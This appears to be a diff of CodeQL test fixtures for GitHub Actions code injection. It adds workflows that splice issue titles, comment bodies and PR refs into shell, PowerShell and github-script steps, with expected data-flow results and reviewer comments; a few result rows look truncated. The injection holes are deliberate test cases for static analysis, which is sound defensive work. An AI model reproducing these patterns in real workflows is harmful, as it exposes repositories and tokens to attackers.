+ steps: + - run: | + { + echo "recreate_vm=${{ contains(github.event.comment.body, 'recreate-vm') }}" + } >> $GITHUB_OUTPUT + 
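Review bot: In test4.yml the three "Dump GitHub issue context" steps all carry `id: github_issue_step` (and the same `name`), but step ids must be unique within a job, so the Actions parser would reject this workflow and any `steps.github_issue_step` reference would be ambiguous. Unless the duplicate ids are deliberately exercising the extractor, give each step its own id, e.g. `id: github_context_step` for the `toJSON(github)` step and `id: github_event_step` for the `toJSON(github.event)` step. If the duplication is intentional, a short comment saying so above the second step would keep it from being "cleaned up" later.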
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml new file mode 100644 index 000000000000..cae9358e8b7d --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml @@ -0,0 +1,20 @@ +name: Test +on: issue_comment +permissions: write-all +jobs: + test: + name: Test + runs-on: ubuntu-latest + steps: + - id: comment-branch + uses: xt0rted/pull-request-comment-branch@v2 + with: + repo_token: ${{ github.token }} + - id: refs + uses: eficode/resolve-pr-refs@main + with: + token: ${{ github.token }} + - run: | + echo "HEAD_REF1 from PR: ${{ steps.comment-branch.outputs.head_ref }}" + - run: | + echo "HEAD_REF2 from PR: ${{ steps.refs.outputs.head_ref }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml new file mode 100644 index 000000000000..3b532e4cc672 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml 
@@ -0,0 +1,48 @@ +run-name: Cleanup ${{ github.head_ref }} +on: + pull_request_target: + types: labeled + paths: + - 'images/**' + +jobs: + clean_ci: + name: Clean CI runs + runs-on: ubuntu-latest + permissions: + actions: write + steps: + - env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + shell: pwsh + run: | + $startDate = Get-Date -UFormat %s + $workflows = @("macos11", "macos12", "ubuntu2004", "ubuntu2204", "windows2019", "windows2022") + while ($true) { + $continue = $false + foreach ($wf in $workflows) { + $skippedCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status skipped --json databaseId" + $skippedIds = Invoke-Expression -Command $skippedCommand | ConvertFrom-Json | ForEach-Object { $_.databaseId } + $skippedIds | ForEach-Object { + $deleteCommand = "gh run delete --repo ${{ github.repository }} $_" + Invoke-Expression -Command $deleteCommand + } + $pendingCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status requested --json databaseId --template '{{ . | len }}'" + $pending = Invoke-Expression -Command $pendingCommand + if ($pending -gt 0) { + Write-Host "Pending for ${wf}.yml: $pending run(s)" + $continue = $true + } + } + if ($continue -eq $false) { + Write-Host "All done, exiting" + break + } + $curDate = Get-Date -UFormat %s + if (($curDate - $startDate) -gt 60) { + Write-Host "Reached timeout, exiting" + break + } + Write-Host "Waiting 5 seconds..." + Start-Sleep -Seconds 5 + } diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml new file mode 100644 index 000000000000..2d60b9fe6d46 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml 
@@ -0,0 +1,43 @@ +name: Test + +on: + issue_comment: + +jobs: + parse-issue: + runs-on: ubuntu-latest + outputs: + payload: ${{ steps.issue_body_parser_request.outputs.payload }} + steps: + - name: Get JSON Data out of Issue Request + uses: peter-murray/issue-body-parser-action@v2 + id: issue_body_parser_request + with: + github_token: ${{ secrets.GITHUB_TOKEN }} + issue_id: ${{ github.event.issue.number }} + payload_marker: request + fail_on_missing: false + - run: echo ${{ steps.issue_body_parser_request.outputs.payload }} + approve-or-deny-request: + runs-on: ubuntu-latest + needs: parse-issue + steps: + - run: echo ${{ needs.parse-issue.outputs.payload }} + - run: echo ${{ fromJson(needs.parse-issue.outputs.payload) }} + - run: echo ${{ fromJson(needs.parse-issue.outputs.payload).version }} + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ fromJson(needs.parse-issue.outputs.payload).version }}.replaceAll(/"/g, '\\"')); + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ toJson(github.event.issue.title) }}.replaceAll(/"/g, '\\"')); + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ github.event.issue.title }}.replaceAll(/"/g, '\\"')); + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ toJson(github.event.issue.title) }}.replaceAll(/"/g, '\\"')); diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml new file mode 100644 index 000000000000..8f691ed759db --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml 
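Review bot: The fourth `actions/github-script@v7` step in test9.yml repeats the second one verbatim (`core.setOutput('issue_title', ${{ toJson(github.event.issue.title) }}.replaceAll(/"/g, '\\"'));`), so it adds no coverage to the fixture. If a distinct variant was intended, for example the `toJSON` spelling used in test25.yml or a different event field, change the expression accordingly; otherwise drop the step. A one-line YAML comment above each github-script step naming the case it covers (e.g. `# fromJson(...).version spliced into a JS expression`) would also make the fixture easier to read alongside its expected output.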
@@ -0,0 +1,15 @@ +on: + pull_request_target + +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: artifact + run: | + echo "::set-output name=pr_number::$(> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | provenance | | +| .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | provenance | | +| .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | 
.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | provenance | | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | provenance | | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | provenance | | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | provenance | | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | provenance | | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | provenance | | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | provenance | | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | provenance | | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value 
| provenance | | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | provenance | | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | provenance | | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | provenance | | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | provenance | | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | provenance | | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | provenance | | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | provenance | | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | provenance | | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | provenance | | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | 
.github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | provenance | | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | provenance | | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | provenance | | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | provenance | | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | provenance | | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | provenance | | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | provenance | | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | provenance | | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | 
.github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | provenance | | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | provenance | | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | provenance | | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | provenance | | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: 
summary [value] | provenance | | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | provenance | | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | provenance | | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | provenance | | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | provenance | | +| .github/workflows/test1.yml:15:5:27:39 | Job: updateJira [ISSUE_KEY] | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | provenance | | +| .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:15:5:27:39 | Job: updateJira [ISSUE_KEY] | provenance | | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | provenance | | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | provenance | | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | provenance | | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | provenance | | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | 
steps.comment-branch.outputs.head_ref | provenance | | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | provenance | | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ 
"$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | provenance | | +| .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | provenance | | +| .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | provenance | | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" 
>> "$GITHUB_ENV"\n | .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | provenance | | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | provenance | | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | provenance | | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:30:5:36:37 | 
Job: test4 [TITLE] | provenance | | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | provenance | | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | provenance | | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | provenance | | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | provenance | | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | provenance | | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | provenance | | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | provenance | | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | provenance | | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | provenance | | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | 
fromJson(steps.get-pr-details.outputs.data).head.ref | provenance | | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | provenance | | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr 
view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:48:9:52:6 | Run Step: 
